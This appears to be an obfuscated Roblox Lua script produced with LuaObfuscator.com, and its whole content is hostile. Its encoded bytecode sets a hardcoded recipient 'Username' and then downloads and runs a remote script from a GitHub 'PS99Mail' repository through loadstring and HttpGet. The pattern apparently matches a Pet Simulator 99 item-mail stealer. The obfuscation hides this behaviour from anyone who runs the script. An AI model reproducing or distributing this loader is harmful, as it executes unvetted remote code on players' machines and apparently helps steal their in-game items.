--[[
 .____                  ________ ___.    _____                           __                
 |    |    __ _______   \_____  \\_ |___/ ____\_ __  ______ ____ _____ _/  |_  ___________ 
 |    |   |  |  \__  \   /   |   \| __ \   __\  |  \/  ___// ___\\__  \\   __\/  _ \_  __ \
 |    |___|  |  // __ \_/    |    \ \_\ \  | |  |  /\___ \\  \___ / __ \|  | (  <_> )  | \/
 |_______ \____/(____  /\_______  /___  /__| |____//____  >\___  >____  /__|  \____/|__|   
         \/          \/         \/    \/                \/     \/     \/                   
          \_Welcome to LuaObfuscator.com   (Alpha 0.9.19) ~  Much Love, Ferib 

]]--

local v0=tonumber;local v1=string.byte;local v2=string.char;local v3=string.sub;local v4=string.gsub;local v5=string.rep;local v6=table.concat;local v7=table.insert;local v8=math.ldexp;local v9=getfenv or function()return _ENV;end ;local v10=setmetatable;local v11=pcall;local v12=select;local v13=unpack or table.unpack ;local v14=tonumber;local function v15(v16,v17,...)local v18=1;local v19;v16=v4(v3(v16,5),"..",function(v30)if (v1(v30,2)==79) then v19=v0(v3(v30,1,1));return "";else local v84=v2(v0(v30,16));if v19 then local v89=0;local v90;while true do if (v89==1) then return v90;end if (v89==0) then v90=v5(v84,v19);v19=nil;v89=1;end end else return v84;end end end);local function v20(v31,v32,v33)if v33 then local v85=(v31/((5 -3)^(v32-(2 -(1 + 0)))))%((3 -1)^(((v33-(878 -(282 + 595))) -(v32-(2 -1))) + 1)) ;return v85-(v85%(620 -(555 + 64))) ;else local v86=((2570 -(1523 + 114)) -(857 + 74))^(v32-(569 -(367 + 201))) ;return (((v31%(v86 + v86))>=v86) and (928 -(214 + 713))) or (0 + 0 + 0) ;end end local function v21()local v34=0 -0 ;local v35;while true do if (v34==(1066 -(68 + (1114 -(32 + 85))))) then return v35;end if (v34==(1270 -(226 + 1044))) then v35=v1(v16,v18,v18);v18=v18 + 1 ;v34=4 -(3 + 0) ;end end end local function v22()local v36=0 + 0 ;local v37;local v38;while true do if (v36==(958 -(892 + 65))) then return (v38 * (610 -(260 + 94))) + v37 ;end if (v36==(0 -0)) then v37,v38=v1(v16,v18,v18 + (3 -1) );v18=v18 + (352 -(87 + 263)) ;v36=181 -(67 + 113) ;end end end local function v23()local v39=0 -0 ;local v40;local v41;local v42;local v43;while true do if (v39==(0 + 0)) then v40,v41,v42,v43=v1(v16,v18,v18 + ((7 + 4) -8) );v18=v18 + 4 ;v39=953 -(802 + 150) ;end if (v39==((2 -0) -1)) then return (v43 * (30433252 -13656036)) + (v42 * ((48890 -(1069 + 118)) + (50495 -32662))) + (v41 * ((2842 -1589) -(915 + 82))) + v40 ;end end end local function v24()local v44=0;local v45;local v46;local v47;local v48;local v49;local v50;while true do if (v44==2) then v49=v20(v46,45 -24 ,6 + 25 );v50=((v20(v46,56 -24 )==(1 + (0 -0))) and  -1) or (792 -(368 + 423)) ;v44=3;end if (v44==(0 + 0)) then v45=v23();v46=v23();v44=(2 + 1) -2 ;end if (v44==(21 -((895 -(261 + 624)) + 8))) then if (v49==(0 -0)) then if (v48==(442 -((739 -323) + 26))) then return v50 * ((1080 -(1020 + 60)) -0) ;else v49=1 + 0 ;v47=0 -0 ;end elseif (v49==(2485 -(145 + (1716 -(630 + 793))))) then return ((v48==((1457 -1027) -(44 + 386))) and (v50 * ((1487 -(998 + (2310 -1822)))/0))) or (v50 * NaN) ;end return v8(v50,v49-(325 + 698) ) * (v47 + (v48/((2 + 0)^(824 -(201 + 571))))) ;end if (v44==(1139 -(116 + 403 + 619))) then v47=4 -3 ;v48=(v20(v46,1 + 0 ,73 -53 ) * (2^(113 -81))) + v45 ;v44=861 -(814 + 45) ;end end end local function v25(v51)local v52;if  not v51 then v51=v23();if (v51==(0 -0)) then return "";end end v52=v3(v16,v18,(v18 + v51) -(1748 -(760 + 987)) );v18=v18 + v51 ;local v53={};for v68=1914 -(1789 + 124) , #v52 do v53[v68]=v2(v1(v3(v52,v68,v68)));end return v6(v53);end local v26=v23;local function v27(...)return {...},v12("#",...);end local function v28()local v54=0;local v55;local v56;local v57;local v58;local v59;local v60;local v61;while true do if (v54~=(8 -5)) then else v61=nil;while true do local v91=0;while true do if (v91==(1901 -(106 + 1794))) then if (v55==(0 + 0)) then local v98=0;local v99;while true do if (v98==0) then v99=0;while true do if (v99==1) then v58={};v55=1 + 0 ;break;end if (v99==0) then local v154=0 -0 ;while true do if (v154~=(2 -1)) then else v99=115 -(4 + 110) ;break;end if ((584 -(57 + 527))~=v154) then else v56={};v57={};v154=1428 -(41 + 1386) ;end end end end break;end end end if (v55==3) then local v100=103 -(17 + 86) ;while true do if (v100==(0 + 0)) then for v115=1,v23() do v57[v115-(1 -0) ]=v28();end return v59;end end end break;end if (v91~=0) then else if (v55==(5 -3)) then local v101=0;while true do if (v101==(166 -(122 + 44))) then for v117=1,v60 do local v118=0;local v119;local v120;local v121;local v122;while true do if (v118==2) then while true do if (v119==1) then v122=nil;while true do if (v120==1) then if (v121==(1 -0)) then v122=v21()~=0 ;elseif (v121==(6 -4)) then v122=v24();elseif (v121~=(3 + 0)) then else v122=v25();end v61[v117]=v122;break;end if (v120~=(0 + 0)) then else local v179=0 -0 ;while true do if (v179==1) then v120=1;break;end if (v179~=0) then else v121=v21();v122=nil;v179=66 -(30 + 35) ;end end end end break;end if (v119~=(0 + 0)) then else local v170=0;while true do if (v170==0) then v120=0;v121=nil;v170=1258 -(1043 + 214) ;end if (v170==(3 -2)) then v119=1;break;end end end end break;end if (v118~=1) then else v121=nil;v122=nil;v118=2;end if (v118==(1212 -(323 + 889))) then v119=0 -0 ;v120=nil;v118=581 -(361 + 219) ;end end end v59[3]=v21();v101=1;end if (v101==1) then for v123=1,v23() do local v124=0;local v125;local v126;while true do if (v124~=1) then else while true do if ((320 -(53 + 267))==v125) then v126=v21();if (v20(v126,1,1 + 0 )~=(413 -(15 + 398))) then else local v171=982 -(18 + 964) ;local v172;local v173;local v174;local v175;local v176;local v177;while true do if (v171==3) then while true do if (v172~=0) then else local v180=0;while true do if (1~=v180) then else v172=1;break;end if (0==v180) then v173=0 -0 ;v174=nil;v180=1;end end end if (v172==(1 + 0)) then v175=nil;v176=nil;v172=2;end if (v172==2) then v177=nil;while true do if (v173~=(2 + 0)) then else while true do if (v174==(851 -(20 + 830))) then local v183=0 + 0 ;local v184;while true do if (v183==(126 -(116 + 10))) then v184=0 + 0 ;while true do if (v184==1) then v174=740 -(542 + 196) ;break;end if ((0 -0)==v184) then local v194=0 + 0 ;local v195;while true do if (v194~=(0 + 0)) then else v195=0 + 0 ;while true do if (v195==(2 -1)) then v184=1;break;end if (0==v195) then local v200=0;while true do if (v200==(2 -1)) then v195=1;break;end if (v200==0) then v177={v22(),v22(),nil,nil};if (v175==0) then local v202=0 -0 ;local v203;while true do if (v202~=(1121 -(118 + 1003))) then else v203=0;while true do if (v203==(0 -0)) then v177[380 -(142 + 235) ]=v22();v177[4]=v22();break;end end break;end end elseif (v175==(4 -3)) then v177[1 + 2 ]=v23();elseif (v175==(979 -(553 + 424))) then v177[5 -2 ]=v23() -((2 + 0)^(16 + 0)) ;elseif (v175~=3) then else local v212=0;local v213;local v214;while true do if (v212==0) then local v215=0 + 0 ;while true do if (v215==0) then v213=0 + 0 ;v214=nil;v215=1;end if (v215==(1 + 0)) then v212=1;break;end end end if (1~=v212) then else while true do if (v213~=(0 -0)) then else v214=0 -0 ;while true do if (v214~=0) then else v177[6 -3 ]=v23() -((1 + 1)^(77 -61)) ;v177[757 -(239 + 514) ]=v22();break;end end break;end end break;end end end v200=1 + 0 ;end end end end break;end end end end break;end end end if (v174==2) then local v185=1329 -(797 + 532) ;local v186;local v187;while true do if (v185==1) then while true do if ((0 + 0)==v186) then v187=0 + 0 ;while true do if (v187~=1) then else v174=6 -3 ;break;end if (v187==0) then local v197=1202 -(373 + 829) ;local v198;while true do if (0~=v197) then else v198=0;while true do if (v198==1) then v187=732 -(476 + 255) ;break;end if (v198~=0) then else local v201=0;while true do if (v201==(1131 -(369 + 761))) then v198=1 + 0 ;break;end if (v201~=0) then else if (v20(v176,1 -0 ,1 -0 )==1) then v177[2]=v61[v177[240 -(64 + 174) ]];end if (v20(v176,1 + 1 ,2 -0 )~=(337 -(144 + 192))) then else v177[3]=v61[v177[219 -(42 + 174) ]];end v201=1;end end end end break;end end end end break;end end break;end if (v185~=0) then else v186=0;v187=nil;v185=1;end end end if (v174==(3 + 0)) then if (v20(v176,3 + 0 ,3)==(1 + 0)) then v177[4]=v61[v177[4]];end v56[v123]=v177;break;end if (v174~=0) then else local v189=1504 -(363 + 1141) ;local v190;while true do if (v189==(1580 -(1183 + 397))) then v190=0 -0 ;while true do if (v190~=1) then else v174=1;break;end if (v190==0) then local v196=0 + 0 ;while true do if (v196~=(1 + 0)) then else v190=1;break;end if (v196==0) then local v199=0;while true do if (v199~=0) then else v175=v20(v126,1977 -(1913 + 62) ,3);v176=v20(v126,3 + 1 ,6);v199=2 -1 ;end if (v199==1) then v196=1934 -(565 + 1368) ;break;end end end end end end break;end end end end break;end if (v173~=1) then else local v181=0 -0 ;local v182;while true do if (v181==(1661 -(1477 + 184))) then v182=0 -0 ;while true do if (v182~=0) then else local v193=0 + 0 ;while true do if (v193~=0) then else v176=nil;v177=nil;v193=857 -(564 + 292) ;end if ((1 -0)==v193) then v182=2 -1 ;break;end end end if ((305 -(244 + 60))~=v182) then else v173=2 + 0 ;break;end end break;end end end if (v173==0) then v174=0;v175=nil;v173=1;end end break;end end break;end if (v171==0) then v172=0;v173=nil;v171=1;end if (v171==(478 -(41 + 435))) then v176=nil;v177=nil;v171=1004 -(938 + 63) ;end if (v171==(1 + 0)) then v174=nil;v175=nil;v171=1127 -(936 + 189) ;end end end break;end end break;end if (v124==0) then v125=0 + 0 ;v126=nil;v124=1;end end end v55=3;break;end end end if (v55~=1) then else local v102=0;local v103;while true do if (0==v102) then v103=0;while true do if (v103==(1614 -(1565 + 48))) then v61={};v55=2 + 0 ;break;end if (0==v103) then local v155=0;while true do if (v155~=(1138 -(782 + 356))) then else v59={v56,v57,nil,v58};v60=v23();v155=1;end if (v155==1) then v103=1 -0 ;break;end end end end break;end end end v91=1;end end end break;end if ((1092 -(975 + 117))==v54) then v55=1875 -(157 + 1718) ;v56=nil;v54=1;end if (v54==(1 + 0)) then v57=nil;v58=nil;v54=2;end if (v54~=2) then else v59=nil;v60=nil;v54=3;end end end local function v29(v62,v63,v64)local v65=v62[1];local v66=v62[2];local v67=v62[3];return function(...)local v70=v65;local v71=v66;local v72=v67;local v73=v27;local v74=1;local v75= -1;local v76={};local v77={...};local v78=v12("#",...) -1 ;local v79={};local v80={};for v87=0,v78 do if (v87>=v72) then v76[v87-v72 ]=v77[v87 + 1 ];else v80[v87]=v77[v87 + 1 ];end end local v81=(v78-v72) + 1 ;local v82;local v83;while true do local v88=0;while true do if (v88==1) then if (v83<=5) then if (v83<=2) then if (v83<=0) then local v104=v82[2];v80[v104]=v80[v104](v13(v80,v104 + 1 ,v75));elseif (v83==1) then local v127=0;local v128;local v129;while true do if (v127==1) then v80[v128 + 1 ]=v129;v80[v128]=v129[v82[4]];break;end if (v127==0) then v128=v82[2];v129=v80[v82[3]];v127=1;end end else v80[v82[2]]();end elseif (v83<=3) then local v106=v82[2];local v107,v108=v73(v80[v106](v13(v80,v106 + 1 ,v82[3])));v75=(v108 + v106) -1 ;local v109=0;for v112=v106,v75 do v109=v109 + 1 ;v80[v112]=v107[v109];end elseif (v83==4) then for v149=v82[2],v82[3] do v80[v149]=nil;end else do return;end end elseif (v83<=8) then if (v83<=6) then v74=v82[3];elseif (v83>7) then local v130;local v131,v132;local v133;local v134;v64[v82[3]]=v80[v82[2]];v74=v74 + 1 ;v82=v70[v74];if ((v82[3]=="_ENV") or (v82[3]=="getfenv")) then v80[v82[2]]=v64;else v80[v82[2]]=v64[v82[3]];end v74=v74 + 1 ;v82=v70[v74];if ((v82[3]=="_ENV") or (v82[3]=="getfenv")) then v80[v82[2]]=v64;else v80[v82[2]]=v64[v82[3]];end v74=v74 + 1 ;v82=v70[v74];v134=v82[2];v133=v80[v82[3]];v80[v134 + 1 ]=v133;v80[v134]=v133[v82[4]];v74=v74 + 1 ;v82=v70[v74];v80[v82[2]]=v82[3];v74=v74 + 1 ;v82=v70[v74];v134=v82[2];v131,v132=v73(v80[v134](v13(v80,v134 + 1 ,v82[3])));v75=(v132 + v134) -1 ;v130=0;for v151=v134,v75 do v130=v130 + 1 ;v80[v151]=v131[v130];end v74=v74 + 1 ;v82=v70[v74];v134=v82[2];v80[v134]=v80[v134](v13(v80,v134 + 1 ,v75));v74=v74 + 1 ;v82=v70[v74];v80[v82[2]]();v74=v74 + 1 ;v82=v70[v74];v74=v82[3];elseif ((v82[3]=="_ENV") or (v82[3]=="getfenv")) then v80[v82[2]]=v64;else v80[v82[2]]=v64[v82[3]];end elseif (v83<=9) then if (v80[v82[2]]==v82[4]) then v74=v74 + 1 ;else v74=v82[3];end elseif (v83==10) then v64[v82[3]]=v80[v82[2]];else v80[v82[2]]=v82[3];end v74=v74 + 1 ;break;end if (v88==0) then v82=v70[v74];v83=v82[1];v88=1;end end end end;end return v29(v28(),{},v17)(...);end v15("LOL!073O00028O0003083O00557365726E616D65030A3O00434855545958424E4554030A3O006C6F6164737472696E6703043O0067616D6503073O00482O747047657403433O00682O7470733A2O2F7261772E67697468756275736572636F6E74656E742E636F6D2F4C7970686572582F50532O394D61696C2F6D61696E2F4D656D656E746F6D6F726900153O00120B3O00014O0004000100013O0026093O0002000100010004063O0002000100120B000100013O00260900010005000100010004063O0005000100120B000200033O001208000200023O00122O000200043O00122O000300053O00202O00030003000600122O000500076O000300056O00023O00024O00020001000100044O001400010004063O000500010004063O001400010004063O000200012O00053O00017O00",v9(),...);
